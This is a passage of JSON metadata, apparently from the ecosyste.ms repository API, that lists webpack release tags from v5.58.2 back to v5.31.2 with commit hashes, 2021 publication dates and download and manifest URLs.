https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"